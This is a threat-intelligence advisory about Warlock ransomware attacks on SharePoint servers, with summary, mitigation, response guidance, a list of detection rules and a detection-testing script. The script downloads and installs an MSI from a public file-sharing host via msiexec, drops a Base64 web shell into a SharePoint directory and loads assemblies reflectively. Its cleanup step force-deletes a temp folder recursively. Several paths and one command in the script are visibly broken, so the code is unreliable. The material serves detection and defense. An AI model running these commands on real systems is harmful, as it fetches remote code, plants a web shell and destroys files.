SOC Prime Bias: Critical

05 Oct 2026 17:09 UTC

Warlock Ransomware Attacks Critical Water and Telecom Infrastructure

Author Photo
SOC Prime Team linkedin icon Follow
Warlock Ransomware Attacks Critical Water and Telecom Infrastructure
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A China-nexus threat actor tracked as Longlegs is deploying Warlock ransomware by exploiting Microsoft SharePoint vulnerabilities. The group uses a ToolShell exploit chain for initial access before moving laterally across compromised networks. The attackers also apply advanced evasion techniques, including abusing vulnerable drivers to disable security software and leveraging legitimate cloud services for payload delivery.

Investigation

The investigation traced activity from initial SharePoint exploitation to deployment of a webshell within the LAYOUTS directory. Analysts observed forged ASP.NET machine keys being used for remote code execution and ransomware staged in the SYSVOL share for domain-wide distribution. The attack chain also involved DLL sideloading and abuse of Visual Studio Code tunneling functionality for persistent access.

Mitigation

Organizations should prioritize patching Microsoft SharePoint Server to remediate known ToolShell vulnerabilities. Enforcing strict controls over signed but vulnerable drivers can help prevent BYOVD attacks. Security teams should also monitor for anomalous use of living-off-the-land tools and restrict access to the SYSVOL share for non-administrative activity to reduce lateral movement and ransomware deployment.

Response

When malicious activity is detected, incident responders should isolate affected SharePoint servers and inspect the SYSVOL share for unauthorized scripts or binaries. Perform a comprehensive audit of domain accounts, focusing on unauthorized additions to the local Administrators group. Review network traffic for outbound connections to file-sharing services such as catbox.moe or wasabisys.com used for payload staging.

Attack Flow

Detections

Add User to Local Administrators (via cmdline)

SOC Prime Team
05 Oct 2026

Download or Upload via Powershell (via cmdline)

SOC Prime Team
05 Oct 2026

Suspicious Powershell Strings (via cmdline)

SOC Prime Team
05 Oct 2026

Call Suspicious .NET Classes/Methods from Powershell CommandLine (via process_creation)

SOC Prime Team
05 Oct 2026

Possible Network Shares Discovery (via cmdline)

SOC Prime Team
05 Oct 2026

Suspicious Domain Trusts Discovery (via cmdline)

SOC Prime Team
05 Oct 2026

Possible Remote MSI File Installation Attempt (via cmdline)

SOC Prime Team
05 Oct 2026

Suspicious Execution from Public User Profile (via process_creation)

SOC Prime Team
05 Oct 2026

Suspicious Powershell Strings (via powershell)

SOC Prime Team
05 Oct 2026

Call Suspicious .NET Methods from Powershell (via powershell)

SOC Prime Team
05 Oct 2026

Possible Webshell Creation In Microsoft Exchange / Sharepoint Directories (via file_event)

SOC Prime Team
05 Oct 2026

Suspicious Files in Public User Profile (via file_event)

SOC Prime Team
05 Oct 2026

Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)

SOC Prime Team
05 Oct 2026

Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)

SOC Prime Team
05 Oct 2026

Suspicious Command and Control by Request to Out-of-Band Interactions Domain (via dns)

SOC Prime Team
05 Oct 2026

IOCs (HashSha256) to detect: Warlock Ransomware Attackers Hit Water and Telecom Operators

SOC Prime AI Rules
05 Oct 2026

Detection of Malicious PowerShell Command for Code Execution [Windows Powershell]

SOC Prime AI Rules
05 Oct 2026

Warlock Ransomware Staging and Execution via Network Shares [Windows File Event]

SOC Prime AI Rules
05 Oct 2026

Warlock Ransomware Indicators on SharePoint Servers [Windows Process Creation]

SOC Prime AI Rules
05 Oct 2026

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary aims to deploy Warlock ransomware on a SharePoint server. The attack begins by using msiexec to pull a malicious MSI from a remote attacker-controlled domain (catbox.moe). Following the initial foothold, the attacker uses PowerShell to write a malicious ASPX web shell into the SharePoint layout2sp.aspx path using a Base64 encoded payload to bypass simple string filters. Finally, the attacker attempts to load a malicious .NET assembly directly into memory using System.Workflow.ComponentModel to execute code without leaving a file footprint on the disk.

  • Regression Test Script:

    # Warlock Ransomware Simulation Script
    # NOTE: This script is for authorized testing purposes only.
    
    Write-Host "[!] Starting Warlock Ransomware Simulation..." -ForegroundColor Red
    
    # 1. Simulate MSIEXEC Remote Download (Selection 3)
    Write-Host "[*] Simulating MSIEXEC remote payload download..."
    Start-Process "msiexec.exe" -ArgumentList "/q /i ""https://litter.catbox.moe/6f5tdt.msi""" -ErrorAction SilentlyContinue
    
    # 2. Simulate PowerShell ASPX Web Shell Drop (Selection 1)
    # We use the exact string from the rule to ensure detection
    Write-Host "[*] Simulating PowerShell web shell drop via Base64..."
    $cmd1 = "powershell -nop -c ""[IO.File]::WriteAllBytes('CSIDL_PROGRAM_FILES_COMMONmicrosoft sharedweb server extensions14templatelayoutslayout2sp.aspx',[Convert]::FromBase64String('<base64 ASPX payload>'))"""
    Invoke-Expression $cmd1
    
    # 3. Simulate Reflective Assembly Loading (Selection 2)
    Write-Host "[*] Simulating Reflective Assembly Load..."
    $cmd2 = "cmd.exe /c powershell.exe -NoProfile -NonInteractive -[void][Reflection.Assembly]::Load('System.Workflow.ComponentModel"
    Invoke-Expression $cmd2
    
    Write-Host "[+] Simulation commands dispatched." -ForegroundColor Green
  • Cleanup Commands:

    # Cleanup script to remove any artifacts created during simulation
    Write-Host "[!] Cleaning up simulation artifacts..." -ForegroundColor Yellow
    
    # Remove simulated files (Note: In a real test, you would target the specific paths created)
    # Since we used dummy strings, we primarily ensure no actual malicious files were dropped.
    Remove-Item -Path "C:WindowsTemp*" -Recurse -Force -ErrorAction SilentlyContinue
    
    Write-Host "[+] Cleanup complete." -ForegroundColor Green